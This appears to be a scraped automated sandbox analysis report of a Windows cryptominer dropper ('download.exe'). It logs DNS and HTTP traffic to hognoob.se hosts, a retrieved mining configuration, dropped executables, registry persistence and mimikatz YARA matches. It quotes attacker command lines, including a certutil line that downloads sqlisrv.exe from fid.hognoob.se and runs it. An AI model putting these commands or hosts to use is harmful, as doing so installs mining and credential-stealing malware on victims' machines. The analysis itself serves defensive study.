8.8.8.8 192.168.2.5 0xe699 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:24.638256073 CEST


May 16, 2019 17:17:26.354038954 CEST

8.8.8.8 192.168.2.5 0xba0b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:28.016495943 CEST

8.8.8.8 192.168.2.5 0x36a9 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:29.792603016 CEST

8.8.8.8 192.168.2.5 0xde13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:31.565807104 CEST


May 16, 2019 17:17:33.221442938 CEST


May 16, 2019 17:17:34.915518999 CEST

8.8.8.8 192.168.2.5 0xcf8d No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:36.564078093 CEST


May 16, 2019 17:17:38.228178024 CEST


May 16, 2019 17:17:39.924240112 CEST

8.8.8.8 192.168.2.5 0xe5a7 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:41.518049955 CEST

8.8.8.8 192.168.2.5 0xb48f No error (0) 2019.ip138.com 117.25.157.119 A (IP address) IN (0x0001)

May 16, 2019 17:17:43.828746080 CEST

8.8.8.8 192.168.2.5 0xb46d No error (0) pxx.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:17:45.178095102 CEST

8.8.8.8 192.168.2.5 0x4023 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)

May 16, 2019 17:17:46.642884970 CEST

8.8.8.8 192.168.2.5 0x2ca7 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)

May 16, 2019 17:18:06.555711985 CEST

8.8.8.8 192.168.2.5 0x6522 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)

May 16, 2019 17:18:08.994851112 CEST

8.8.8.8 192.168.2.5 0xddac No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:18:11.550880909 CEST

8.8.8.8 192.168.2.5 0xffac No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)

May 16, 2019 17:18:14.258923054 CEST

8.8.8.8 192.168.2.5 0x612a No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)


fid.hognoob.seuio.hognoob.se:63145

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.2.5 49797 45.67.14.164 80 C:\Users\user\Desktop\download.exe

HTTP Request Dependency Graph

HTTP Packets


TimestampkBytestransferred Direction Data

May 16, 2019 17:15:39.184736013 CEST

0 OUT GET /sqlisrv.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: fid.hognoob.seCache-Control: no-cache

May 16, 2019 17:15:39.233145952 CEST

2 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:39 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 00 00 42 47 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 60 00 00 04 00 00 00 46 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:3~]~]~]Q{]Vw]Wx]SR](NR]|]~\]Nc]HW]HV]V]We]~]*][]Rich~]PEL\PG_`@ ``|UPX0UPX1PGBG@UPX2`FG@




May 16, 2019 17:15:44.320504904 CEST

4880 OUT GET /sqlisrv.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: fid.hognoob.se


May 16, 2019 17:15:44.368107080 CEST






May 16, 2019 17:15:47.054552078 CEST

9701 OUT GET /sqlisrv.exe HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: fid.hognoob.seCache-Control: no-cache

May 16, 2019 17:15:47.101970911 CEST



Code Manipulations

Statistics

Behavior

• download.exe

• qwr4rt.exe

• ycemck.exe

• sqlisrv.exe

• cmd.exe

• cmd.exe

• conhost.exe

• conhost.exe

• PING.EXE

• certutil.exe

• b158ac7.exe

• b158ac7.exe

• cmd.exe


3 192.168.2.5 49808 195.128.126.120 63145 C:\Windows\cc3d3243\b158ac7.exe


May 16, 2019 17:15:53.229324102 CEST

14580 OUT GET /cfg.ini HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: uio.hognoob.se:63145Cache-Control: no-cache

May 16, 2019 17:15:53.290889025 CEST

14581 IN HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 14 May 2019 20:09:55 GMTAccept-Ranges: bytesETag: "867ebbff90ad51:0"Server: Microsoft-IIS/7.5Date: Thu, 16 May 2019 15:15:55 GMTContent-Length: 299Data Raw: 5b 55 70 64 61 74 65 4e 6f 64 65 5d 0d 0a 4e 6f 64 65 31 3d 75 70 61 31 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 4e 6f 64 65 32 3d 75 70 61 32 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 5b 4d 61 69 6e 55 70 64 61 74 65 5d 0d 0a 4d 61 69 6e 56 65 72 73 69 6f 6e 3d 32 30 31 39 30 35 31 35 0d 0a 4d 61 69 6e 45 78 65 4e 61 6d 65 3d 65 76 65 6e 73 76 63 0d 0a 4d 61 69 6e 53 69 7a 65 3d 34 36 37 32 30 30 30 0d 0a 5b 44 6f 77 6e 6c 6f 61 64 5d 0d 0a 55 72 6c 3d 68 74 74 70 3a 2f 2f 66 69 64 2e 68 6f 67 6e 6f 6f 62 2e 73 65 2f 64 6f 77 6e 6c 6f 61 64 2e 65 78 65 0d 0a 5b 4d 69 6e 49 6e 67 5d 0d 0a 4d 69 6e 65 55 70 64 61 74 65 3d 6f 66 66 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 42 61 63 6b 55 70 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 43 50 55 4f 63 63 75 50 61 6e 63 79 3d 31 Data Ascii: [UpdateNode]Node1=upa1.hognoob.seNode2=upa2.hognoob.se[MainUpdate]MainVersion=20190515MainExeName=evensvcMainSize=4672000[Download]Url=http://fid.hognoob.se/download.exe[MinIng]MineUpdate=offMiningPool=pxx.hognoob.se:35789MiningPoolBackUp=pxx.hognoob.se:35789CPUOccuPancy=1

May 16, 2019 17:15:53.295945883 CEST

14581 OUT GET /cfg.ini HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: uio.hognoob.se:63145Cache-Control: no-cache

May 16, 2019 17:15:53.355729103 CEST

14582 IN HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 14 May 2019 20:09:55 GMTAccept-Ranges: bytesETag: "867ebbff90ad51:0"Server: Microsoft-IIS/7.5Date: Thu, 16 May 2019 15:15:55 GMTContent-Length: 299Data Raw: 5b 55 70 64 61 74 65 4e 6f 64 65 5d 0d 0a 4e 6f 64 65 31 3d 75 70 61 31 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 4e 6f 64 65 32 3d 75 70 61 32 2e 68 6f 67 6e 6f 6f 62 2e 73 65 0d 0a 5b 4d 61 69 6e 55 70 64 61 74 65 5d 0d 0a 4d 61 69 6e 56 65 72 73 69 6f 6e 3d 32 30 31 39 30 35 31 35 0d 0a 4d 61 69 6e 45 78 65 4e 61 6d 65 3d 65 76 65 6e 73 76 63 0d 0a 4d 61 69 6e 53 69 7a 65 3d 34 36 37 32 30 30 30 0d 0a 5b 44 6f 77 6e 6c 6f 61 64 5d 0d 0a 55 72 6c 3d 68 74 74 70 3a 2f 2f 66 69 64 2e 68 6f 67 6e 6f 6f 62 2e 73 65 2f 64 6f 77 6e 6c 6f 61 64 2e 65 78 65 0d 0a 5b 4d 69 6e 49 6e 67 5d 0d 0a 4d 69 6e 65 55 70 64 61 74 65 3d 6f 66 66 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 4d 69 6e 69 6e 67 50 6f 6f 6c 42 61 63 6b 55 70 3d 70 78 78 2e 68 6f 67 6e 6f 6f 62 2e 73 65 3a 33 35 37 38 39 0d 0a 43 50 55 4f 63 63 75 50 61 6e 63 79 3d 31 Data Ascii: [UpdateNode]Node1=upa1.hognoob.seNode2=upa2.hognoob.se[MainUpdate]MainVersion=20190515MainExeName=evensvcMainSize=4672000[Download]Url=http://fid.hognoob.se/download.exe[MinIng]MineUpdate=offMiningPool=pxx.hognoob.se:35789MiningPoolBackUp=pxx.hognoob.se:35789CPUOccuPancy=1


• conhost.exe

• cmd.exe

• cacls.exe

• netsh.exe

• conhost.exe

• netsh.exe

• conhost.exe

• cmd.exe

• cacls.exe

• cmd.exe

• cacls.exe

• sqlisrv.exe

• cmd.exe

• conhost.exe

• GogoleUpadte.exe

• cmd.exe

• cmd.exe

• conhost.exe

• conhost.exe

• vfshost.exe

• ouousbpro.exe

• cmd.exe

• cmd.exe

• conhost.exe

Click to jump to process

System Behavior

File ActivitiesFile Activities


Start date: 16/05/2019

Path: C:\Users\user\Desktop\download.exe

Wow64 process (32bit): true

Commandline: 'C:\Users\user\Desktop\download.exe'

Imagebase: 0x400000

File size: 322560 bytes

MD5 hash: 31E46700743FAA4304532B36311E1177

Has administrator privileges: true

Programmed in: C, C++ or other language

Yara matches: Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5123455439.0000000000767000.00000004.sdmp, Author: Florian RothRule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5112633665.0000000000540000.00000004.sdmp, Author: Florian RothRule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.5104166883.0000000000401000.00000040.sdmp, Author: Florian Roth

Reputation: low

File Path Access Attributes Options Completion CountSourceAddress Symbol

C:\WebKitSdk\ read data or list directory | synchronize

normal directory file | synchronous io non alert | open for backup ident | open reparse point

success or wait 1 401CAF CreateDirectoryA

Analysis Process: download.exe PID: 3076 Parent PID: 3220Analysis Process: download.exe PID: 3076 Parent PID: 3220

General

File CreatedFile Created


C:\WebKitSdk\2.25.14\ read data or list directory | synchronize


success or wait 1 401CAF CreateDirectoryA

C:\WebKitSdk\2.25.14\qwr4rt.exe read attributes | synchronize | generic write

normal synchronous io non alert | non directory file

success or wait 1 470034 CreateFileA

C:\WebKitSdk\2.25.14\sqlisrv.exe read attributes | synchronize | generic write

normal synchronous io non alert | non directory file

success or wait 1 470034 CreateFileA

C:\Users\user\AppData\Local\Temp\509703 read data or list directory | synchronize


success or wait 1 4016C1 CreateDirectoryA

C:\Users\user\AppData\Local\Temp\509703\....\ read data or list directory | synchronize


success or wait 1 4016FE CreateDirectoryA



success or wait 1 4016C1 CreateDirectoryA



success or wait 1 4016FE CreateDirectoryA


File Path Completion CountSourceAddress Symbol

C:\Users\user\AppData\Local\Temp\509718\TemporaryFile\TemporaryFile cannot delete 1 417156 DeleteFileA

Old File Path New File Path Completion CountSourceAddress Symbol

C:\Users\user\AppData\Local\Temp\509703\.... C:\Users\user\AppData\Local\Temp\509703\TemporaryFile success or wait 1 4017B2 MoveFileA

C:\Users\user\Desktop\download.exe C:\Users\user\AppData\Local\Temp\509718\....\TemporaryFile success or wait 1 40174D MoveFileA

C:\Users\user\AppData\Local\Temp\509718\.... C:\Users\user\AppData\Local\Temp\509718\TemporaryFile success or wait 1 4017B2 MoveFileA

File Path Offset Length Value Ascii Completion CountSourceAddress Symbol

File DeletedFile Deleted

File MovedFile Moved

File WrittenFile Written


C:\WebKitSdk\2.25.14\qwr4rt.exe unknown 73728 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 6d de 5c 65 0c b0 0f 65 0c b0 0f 65 0c b0 0f 1e 10 bc 0f 64 0c b0 0f a6 03 ed 0f 63 0c b0 0f e6 10 be 0f 64 0c b0 0f 0a 13 bb 0f 64 0c b0 0f 0a 13 ba 0f 6e 0c b0 0f 0a 13 b4 0f 67 0c b0 0f 53 2a bb 0f 66 0c b0 0f 53 2a b4 0f 66 0c b0 0f 65 0c b1 0f 6e 0d b0 0f 8d 13 bb 0f 6c 0c b0 0f a2 0a b6 0f 64 0c b0 0f 52 69 63 68 65 0c b0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche..................

success or wait 1 4700CB WriteFile

C:\WebKitSdk\2.25.14\sqlisrv.exe unknown 4672000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...]

success or wait 1 4700CB WriteFile


File Path Offset Length Completion CountSourceAddress Symbol



Path: C:\WebKitSdk\2.25.14\qwr4rt.exe

Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076

General



Registry ActivitiesRegistry Activities


Commandline: C:\WebKitSdk\2.25.14\qwr4rt.exe

Imagebase: 0x400000


MD5 hash: EABDC54C61088B769E9AF917AA6B05A4



Antivirus matches: Detection: 100%, AviraDetection: 79%, virustotal, Browse

Reputation: low


C:\Windows\SysWOW64\ycemck.exe read data or list directory | read attributes | delete | write dac | synchronize | generic read | generic write

archive sequential only | non directory file

success or wait 1 100033DA CopyFileA


C:\WebKitSdk\2.25.14\qwr4rt.exe C:\Windows\SysWOW64\506281.bak success or wait 1 10002093 MoveFileA


C:\Windows\SysWOW64\ycemck.exe 0 73728 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 6d de 5c 65 0c b0 0f 65 0c b0 0f 65 0c b0 0f 1e 10 bc 0f 64 0c b0 0f a6 03 ed 0f 63 0c b0 0f e6 10 be 0f 64 0c b0 0f 0a 13 bb 0f 64 0c b0 0f 0a 13 ba 0f 6e 0c b0 0f 0a 13 b4 0f 67 0c b0 0f 53 2a bb 0f 66 0c b0 0f 53 2a b4 0f 66 0c b0 0f 65 0c b1 0f 6e 0d b0 0f 8d 13 bb 0f 6c 0c b0 0f a2 0a b6 0f 64 0c b0 0f 52 69 63 68 65 0c b0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche..................

success or wait 1 100033DA CopyFileA







Key Path Name Type Data Completion CountSourceAddress Symbol

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu

Group unicode Default success or wait 1 10004A8C RegSetValueExA


InstallTime unicode 2019-05-16 17:15 success or wait 1 10004A8C RegSetValueExA

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager

PendingFileRenameOperations

unicode array \??\C:\Windows\SysWOW64\506281.bak

success or wait 1 100020A4 MoveFileExA

Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol


Description unicode nprrstu nprrstu Yabcdefgh Jklmnop Rstuvwxy Bcd

success or wait 1 100035CA RegSetValueExA




Path: C:\Windows\SysWOW64\ycemck.exe


Commandline: C:\Windows\SysWOW64\ycemck.exe

Imagebase: 0x400000


MD5 hash: EABDC54C61088B769E9AF917AA6B05A4



Antivirus matches: Detection: 100%, AviraDetection: 79%, virustotal, Browse

Reputation: low




Path: C:\WebKitSdk\2.25.14\sqlisrv.exe


Commandline: C:\WebKitSdk\2.25.14\sqlisrv.exe

Imagebase: 0x400000


MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E



Key Value CreatedKey Value Created

Key Value ModifiedKey Value Modified

Analysis Process: ycemck.exe PID: 3268 Parent PID: 564Analysis Process: ycemck.exe PID: 3268 Parent PID: 564

General

Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076

General




Yara matches: Rule: mimikatz, Description: mimikatz, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: @fusionrace

Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse

Reputation: low


C:\Windows\cc3d3243\ read data or list directory | synchronize


success or wait 1 42A03F CreateDirectoryA

C:\Windows\cc3d3243\b158ac7.exe read data or list directory | read attributes | delete | write dac | synchronize | generic read | generic write

archive sequential only | non directory file

success or wait 1 42A083 CopyFileA



success or wait 1 404859 CreateDirectoryA



success or wait 1 404896 CreateDirectoryA

File Path Completion CountSourceAddress Symbol

C:\Users\user\AppData\Local\Temp\509484\TemporaryFile\TemporaryFile cannot delete 1 442366 DeleteFileA


C:\WebKitSdk\2.25.14\sqlisrv.exe C:\Users\user\AppData\Local\Temp\509484\....\TemporaryFile success or wait 1 4048E5 MoveFileA

C:\Users\user\AppData\Local\Temp\509484\.... C:\Users\user\AppData\Local\Temp\509484\TemporaryFile success or wait 1 40494A MoveFileA



File DeletedFile Deleted





C:\Windows\cc3d3243\b158ac7.exe 0 524288 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...]

success or wait 9 42A083 CopyFileA






Path: C:\Windows\SysWOW64\cmd.exe


Commandline: cmd /c ping 127.0.0.1 -n 8 & Start C:\Windows\cc3d3243\b158ac7.exe

Imagebase: 0x1180000


MD5 hash: F3BDBE3BB6F734E357235F4D5898582D



Reputation: high






Commandline: cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe %SystemRoot%\Temp\sqlisrv.exe & %SystemRoot%\Temp\sqlisrv.exe

Analysis Process: cmd.exe PID: 1896 Parent PID: 4748Analysis Process: cmd.exe PID: 1896 Parent PID: 4748

General


General








Reputation: high




Path: C:\Windows\System32\conhost.exe

Wow64 process (32bit): false

Commandline: C:\Windows\system32\conhost.exe 0x4

Imagebase: 0x7ff601f50000


MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496



Reputation: high











Reputation: high



Path: C:\Windows\SysWOW64\PING.EXE


Commandline: ping 127.0.0.1 -n 8

Imagebase: 0x2d0000


MD5 hash: 70C24A306F768936563ABDADB9CA9108



Analysis Process: conhost.exe PID: 2560 Parent PID: 1896Analysis Process: conhost.exe PID: 2560 Parent PID: 1896

General


General

Analysis Process: PING.EXE PID: 2864 Parent PID: 1896Analysis Process: PING.EXE PID: 2864 Parent PID: 1896

General



Reputation: moderate





Path: C:\Windows\SysWOW64\certutil.exe


Commandline: certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe C:\Windows\Temp\sqlisrv.exe

Imagebase: 0x10a0000


MD5 hash: D056DF596F6E02A36841E69872AEF7BD



Reputation: moderate




unknown 3325 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 39 34 00 55 50 58 21 0d 09 08 09 d0 c5 8e 26 e5 7a 9a a9 5a dd 5f 00 ee 3f 47 00 00 50 5c 00 26 1e 00 39 fe db

..............................

..............................

..............................

..............................

..............................

..............................

..............................

......3.94.UPX!.......&.z..Z._

..?G..P\.&..9..

success or wait 1 10E751E InternetReadFile

Analysis Process: certutil.exe PID: 3304 Parent PID: 4080Analysis Process: certutil.exe PID: 3304 Parent PID: 4080

General




